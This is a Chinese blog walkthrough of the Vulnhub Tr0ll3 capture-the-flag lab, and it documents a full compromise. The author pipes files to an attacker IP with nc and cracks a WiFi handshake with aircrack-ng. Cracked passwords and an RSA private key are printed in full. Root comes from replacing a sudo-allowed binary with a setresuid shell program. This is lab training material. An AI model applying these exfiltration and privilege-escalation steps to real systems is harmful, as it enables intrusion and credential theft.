[Vulnhub] Tr0ll3 aircrack-ng+lynx

最新推荐文章于 2024-08-09 09:10:08 发布
最新推荐文章于 2024-08-09 09:10:08 发布
阅读量279 收藏 5
点赞数 4
分类专栏: Vulnhub 文章标签: http
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140407457
版权

信息收集

IP AddressOpening Ports
192.168.101.147TCP:22

image.png

$ ssh start@192.168.101.147

image-1.png

用户:Start

start@Tr0ll3:~$ find / -type f -perm 0777 2>/tmp/1

start@Tr0ll3:~$ cat /var/log/.dist-manage/wytshadow.cap | nc 192.168.101.128 10035

WIFI握手包

image-2.png

aircrack-ng 破解握手包

start@Tr0ll3:~$ cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt | nc 192.168.101.128 10035

$ aircrack-ng -w gold_star.txt wytshadow.cap

image-3.png

用户:wytshadow

wytshadow:gaUoCe34t1

image-4.png

wytshadow@Tr0ll3:/home/start$ sudo -l

image-6.png

wytshadow@Tr0ll3:/home/start$ cat /etc/nginx/sites-available/default

image-7.png

wytshadow@Tr0ll3:/home/start$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/home/start$ netstat -lnput

image-8.png

$ lynx http://192.168.101.147:8080

Lynx是一款文本模式的网页浏览器。它最初由Thomas Dickey在1992年开发,旨在为没有图形界面的终端用户提供网页浏览功能。Lynx在Unix和Linux系统上尤其流行,因为它可以通过命令行界面快速浏览网页而不需要图形界面支持

image-9.png

Username: genphlux
Password: HF9nd0cR!

用户:genphlux

genphlux@Tr0ll3:~$ su genphulx

image-10.png

genphlux@Tr0ll3:~$ file maleus

image-11.png

genphlux@Tr0ll3:~$ cat maleus

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----

用户:maleus

$ chmod 600 key
$ ssh maleus@192.168.101.147 -i id_rsa

image-12.png

maleus@Tr0ll3:~$ cat .viminfo

image-13.png

password:B^slc8I$

权限提升

image-14.png

通过重新编译来获取ROOT权限

image-15.png

maleus@Tr0ll3:~$ echo -e 'int main (void){setresuid(0, 0, 0);system("/bin/sh");}'>dont_even_bother.c
maleus@Tr0ll3:~$ rm dont_even_bother
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother

image-16.png

maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother

image-17.png

# cat /root/flag.txt

image-18.png

Pr00fThatTh3L33tHax0rG0tTheFl@g!!

Мартин.
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
aircrack-ng-1.6.tar.gz
03-16
3. **依赖库(Library Dependencies)**:列出编译和运行aircrack-ng所需的外部库,用户需要确保系统已安装这些库。 4. **配置文件(Configuration Files)**:可能包含默认配置,用户可以根据需求进行修改。 5. **...
aircrack-ng-1.6-win.zip
04-09
aircrack-ng-1.6-win.zip
Tr0ll3 vulnhub靶场 (scp)
weixin_62621015的博客
03-13 183
Tr0ll3 vunlhub靶场个人通关笔记
OSCP练习:vulhub靶机TR0LL 3攻略
weixin_47311099的博客
10-25 355
OSCP练习:vulhub靶机TR0LL 2攻略
vulnhub Tr0ll3 WriteUp
weixin_43202322的博客
08-13 641
目录前言0x00 nmap扫描0x01 登陆0x02 寻找突破口0x03 提权总结 前言 下载地址:1. 镜像 2. vulnhub 这个盒子给我的感觉就是:永远不要相信作者的鬼提示 还是感谢作者(@maleus21)的贡献 0x00 nmap扫描 只扫出来22端口:ssh服务 0x01 登陆 有提示,使用start : here 尝试登陆,成功!作者太直接了吧。 然后开始到处找寻...
aircrack-ng + wireshark 进行wireless packet sniffer
sdc20102010的博客
10-12 1069
我们用aircrack-ng + wireshark 可以进行 空气抓包, 这个非常简单不需要ominpic 工具了。
WIFI 破解与加固(Aircrack-ng + 无线网卡)
Debroon
07-23 1万+
《目录》 破解密码的捷径 Aircrack-ng 简介 破解配置 破解流程 Wi-Fi 密码破解后 破解密码的捷径 方法一: WIFI万能钥匙,TA 之所以能快速破解WIFI密码,是因为 TA 把您手...
[Vulnhub] BillyMadison1dot Wireshark+Port-Knocking+SMTP+Aircrack-ng+donpcgd+veracrypt
06-17 1041
Eric通过Billy的女友Vvaughn入侵了Billy的计算机,并且Eric把Billy的某个归档文件加密上锁了。
渗透测试--6.1.aircrack-ng破解wifi密码
我是个好人呀,????
05-18 9670
是一个完整的工具来评估Wi-Fi网络安全套件(ex.1)。
kali Aircrack-ng使用教程
热门推荐
weixin_31501115的博客
07-12 2万+
准备好kali系统,电脑可以链接无线wifi!!使用Aircrack-ng 进行暴力破解,linux上已经安装此工具!1.执行以下命令查看电脑设备,airgeddon破解工具 检查出现wlan0 即可!因为本人电脑的特殊性,有一个单读网卡wlan1(本案例用的wlan1)2.监听附近网络: 完成上述操作后,我门内再次用的命令查看此时会如下图出现wlan0mon,说明已经进入监听状态3.扫描附近的网络,开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式 ............
使用aircrack-ng破解wifi密码
weixin_46864811的博客
02-18 1190
一、准备阶段 二、扫描阶段 三、抓包阶段 四、Hash爆破
无线安全及Aircrack-ng for windows教程.docx
06-13
无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for windows教程.docx无线安全及Aircrack-ng for ...
Windows系统下运行aircrack-ng
06-30
aircrack-ng V1.6现支持在Windows系统下运行,可以通过CMD输入命令方式破解无线网络,或通过aircrack-ng GUI图形界面对无线进行破解
Aircrack-ng.rar_aircrack-ng _hack
07-14
eaisiest way to hack any wifi
通过java.netHttpURLConnection类实现java发送http请求
weixin_46018178的博客
08-06 256
【代码】通过java.netHttpURLConnection类实现java发送http请求。
http不同类型方法的作用,get和post区别
最新发布
salmonwilliam的博客
08-09 862
RESTful API是一种基于**Representational State Transfer**(REST)架构风格的Web服务接口设计方法。REST由Roy Fielding在2000年的博士论文中首次提出,是一种轻量级的、基于HTTP协议的API设计风格。RESTful API通过使用HTTP的标准方法来执行各种操作,如GET、POST、PUT、DELETE等,使得Web服务更加简单和可扩展。
大数据项目——广告数仓之HTTP概述
weixin_63106307的博客
08-06 1030
其实还有一个东西叫做DNS(域名解析系统),它其实是一些互联网厂商提供的一个把域名解析为ip地址的服务(它有一个域名和ip地址对应关系的表),而且DNS服务器的IP地址是事先写到路由器或上游网络设备的设置里的。这个时候,香港城市大学的服务器又往后找了几条新闻,返回到了你的浏览器上。假如这是香港城市大学的一台服务器,这台服务器上提供了一个web服务,所谓服务,其实就是一个24小时运行在服务器上的程序。最后,需要说明,域名是有专门的机构进行管理的,当你注册cityu.edu.hk这个域名时,别人就不能注册了。
HTTP的场景实践
学习笔记分享给大家
08-08 238
HTTP的场景实践:任选一个浏览器,对于其涉及的请求中的缓存策略展开具体分析
termux+aircrack-ng
01-15
在Termux上使用aircrack-ng进行无线网络渗透测试是可行的。下面是一些步骤来安装和使用aircrack-ng: 1. 首先,确保你的设备已经root或者已经安装了Termux应用。 2. 打开Termux应用,并执行以下命令来更新软件包列表: ```shell pkg update ``` 3. 安装必要的软件包,包括git和wget: ```shell pkg install git wget ``` 4. 下载aircrack-ng的源代码: ```shell git clone https://github.com/aircrack-ng/aircrack-ng.git ``` 5. 进入下载的目录: ```shell cd aircrack-ng ``` 6. 编译和安装aircrack-ng: ```shell make make install ``` 7. 安装依赖库: ```shell apt install libnl-dev ``` 8. 现在,你可以使用aircrack-ng来执行无线网络渗透测试了。例如,你可以使用以下命令来查找附近的无线网络: ```shell airodump-ng wlan0 ``` 请注意,Termux上的aircrack-ng可能不支持所有的无线网卡。在使用之前,请确保你的无线网卡在Termux上是兼容的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值